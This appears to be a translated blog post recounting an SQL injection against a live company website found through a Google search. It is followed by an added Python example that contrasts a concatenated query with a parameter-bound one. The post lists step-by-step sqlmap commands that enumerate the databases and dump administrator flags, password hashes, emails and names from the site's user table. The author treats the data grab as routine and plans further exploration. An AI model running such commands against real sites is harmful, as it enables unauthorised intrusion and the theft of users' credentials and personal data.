Record the SQL injection vulnerability of XX company
2022-07-29 05:42:00 【adeylinux】
In the morning, when I got up, a friend asked me to participate in a public-welfare SRC, so I was dragged into exploring the public-welfare SRC. I opened Google and searched for: inurl: Science and technology company. Then I opened a website. While browsing the site I noticed ?id and, out of occupational habit, added a single quotation mark after ?id. The page changed. I guessed it was an XSS or SQL injection vulnerability.

I started the penetration test.
I took out sqlmap and went all in.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
It turned out there really was a vulnerability. Then I continued testing:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
There are two databases: bdm818993245_db, information_schema
Then I went all in again.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
The bdm818993245_db database has 9 tables:
| user             |
| gplat_book       |
| gplat_news       |
| gplat_newsclass  |
| gplat_newsclass2 |
| href             |
| job              |
| job_add          |
| lawyer_wenda     |
Next, I queried the administrator and password under the user table.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
The user table has the following 13 columns:
+-----------+---------------+
| Column    | Type          |
+-----------+---------------+
| adder     | varchar(8)    |
| admin     | int(2)        |
| email     | varchar(60)   |
| grade     | varchar(12)   |
| id        | int(6)        |
| image     | varchar(70)   |
| name      | varchar(60)   |
| pass      | varchar(60)   |
| phone     | varchar(14)   |
| qianming  | varchar(100)  |
| times     | datetime      |
| up_time   | datetime      |
| xingb     | varchar(2)    |
+-----------+---------------+
Next, I queried the admin and pass data under user:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
Next, I collected the data of the database:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump
Then I collected more data:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C 
Then I queried the user name of the administrator:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
The collection was almost done, so I ended the penetration test. I will study the rest of the databases, tables and columns slowly.
Summary:
For SQL injection, try to inject by hand, because tools run against the website and it is easy to jump.
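
The single-quote behaviour described at the start of this post comes from a request parameter being pasted into the SQL text. The following is an added example, not code from the original post or from the affected site: it shows that pattern beside a validated, parameter-bound query. It assumes an in-memory SQLite stand-in for the site's database; the function names, the columns of gplat_news and the sample rows are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; only the table name gplat_news comes from the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gplat_news (id INTEGER PRIMARY KEY, class INTEGER, title TEXT)")
    db.executemany("INSERT INTO gplat_news (class, title) VALUES (?, ?)",
                   [(1, "Company news"), (1, "Product launch"), (2, "Industry news")])
    return db

def news_vulnerable(db, raw_class):
    # Assumed "before" pattern: the request parameter becomes part of the SQL text.
    sql = "SELECT title FROM gplat_news WHERE class = " + raw_class + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def news_hardened(db, raw_class):
    # 1) Allow-list the type: a class id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,6}", raw_class):
        raise ValueError("class must be an integer")
    # 2) Bind the value; the SQL text is a constant and never contains user input.
    cur = db.execute("SELECT title FROM gplat_news WHERE class = ? ORDER BY id",
                     (int(raw_class),))
    return [row[0] for row in cur]

def respond(query_fn, db, raw_class):
    # Map outcomes to what the client sees. A database error that changes the page
    # is the signal the single quote produced; a uniform 400 removes that signal.
    try:
        return 200, query_fn(db, raw_class)
    except ValueError:
        return 400, []
    except sqlite3.Error:
        return 500, []

if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "1'"):
        print(repr(raw), respond(news_vulnerable, db, raw), respond(news_hardened, db, raw))
```
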
